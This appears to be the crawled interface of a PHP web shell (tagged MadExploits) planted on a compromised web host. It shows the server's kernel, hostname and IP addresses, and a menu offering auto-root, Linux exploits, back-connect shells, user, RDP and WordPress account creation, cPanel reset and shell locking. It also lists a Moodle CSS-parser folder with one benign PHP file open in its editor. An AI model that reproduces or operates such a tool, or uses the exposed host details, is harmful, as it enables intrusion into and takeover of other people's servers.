Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 108.162.216.82
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
php-css-parser /
[ HOME SHELL ]
Name
Size
Permission
Action
CSSList
[ DIR ]
drwxr-xr-x
Comment
[ DIR ]
drwxr-xr-x
Parsing
[ DIR ]
drwxr-xr-x
Property
[ DIR ]
drwxr-xr-x
Rule
[ DIR ]
drwxr-xr-x
RuleSet
[ DIR ]
drwxr-xr-x
Value
[ DIR ]
drwxr-xr-x
OutputFormat.php
8.55
KB
-rw-r--r--
Parser.php
886
B
-rw-r--r--
Renderable.php
189
B
-rw-r--r--
Settings.php
1.31
KB
-rw-r--r--
moodle_readme.txt
371
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Settings.php
<?php namespace Sabberworm\CSS; use Sabberworm\CSS\Rule\Rule; /** * Parser settings class. * * Configure parser behaviour here. */ class Settings { /** * Multi-byte string support. If true (mbstring extension must be enabled), will use (slower) mb_strlen, mb_convert_case, mb_substr and mb_strpos functions. Otherwise, the normal (ASCII-Only) functions will be used. */ public $bMultibyteSupport; /** * The default charset for the CSS if no `@charset` rule is found. Defaults to utf-8. */ public $sDefaultCharset = 'utf-8'; /** * Lenient parsing. When used (which is true by default), the parser will not choke on unexpected tokens but simply ignore them. */ public $bLenientParsing = true; private function __construct() { $this->bMultibyteSupport = extension_loaded('mbstring'); } public static function create() { return new Settings(); } public function withMultibyteSupport($bMultibyteSupport = true) { $this->bMultibyteSupport = $bMultibyteSupport; return $this; } public function withDefaultCharset($sDefaultCharset) { $this->sDefaultCharset = $sDefaultCharset; return $this; } public function withLenientParsing($bLenientParsing = true) { $this->bLenientParsing = $bLenientParsing; return $this; } public function beStrict() { return $this->withLenientParsing(false); } }
Close